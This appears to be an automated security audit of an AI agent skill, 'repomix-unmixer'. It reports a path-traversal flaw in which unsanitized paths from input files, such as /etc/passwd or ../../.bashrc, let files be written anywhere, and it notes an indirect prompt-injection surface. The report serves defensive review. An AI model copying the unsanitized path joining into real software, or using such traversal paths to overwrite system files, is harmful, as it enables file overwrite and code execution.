repomix-unmixer
Fail
Audited by Gen Agent Trust Hub on Feb 23, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The Python script
scripts/unmix_repomix.pyis vulnerable to path traversal. In theunmix_xml,unmix_markdown, andunmix_jsonfunctions, thefile_pathis extracted directly from the untrusted input file and joined with the output directory usingPath(output_dir) / file_path. Becausepathlibjoins absolute paths by overriding the base and does not automatically resolve../sequences to ensure they remain within the base directory, an attacker can specify paths like/etc/passwdor../../.bashrcto write files anywhere the user has permissions. This allows for arbitrary file overwrite, which can lead to persistence or remote code execution.\n- [PROMPT_INJECTION] (LOW): The skill possesses a significant Indirect Prompt Injection surface (Category 8).\n - Ingestion points:
scripts/unmix_repomix.pyreads and parses untrusted data from user-provided files (XML, Markdown, or JSON formats).\n - Boundary markers: Absent. The script relies on regex/JSON keys and does not use any delimiters or instructions to ignore malicious control characters in the file paths or content.\n
- Capability inventory: The skill provides a script with the capability to create directories and write files to the file system (
pathlib.Path.mkdir,open(..., 'w')).\n - Sanitization: Absent. There is no validation, normalization, or sanitization performed on the paths extracted from the input data to prevent traversal outside the intended output directory.
Recommendations
- AI detected serious security threats
Audit Metadata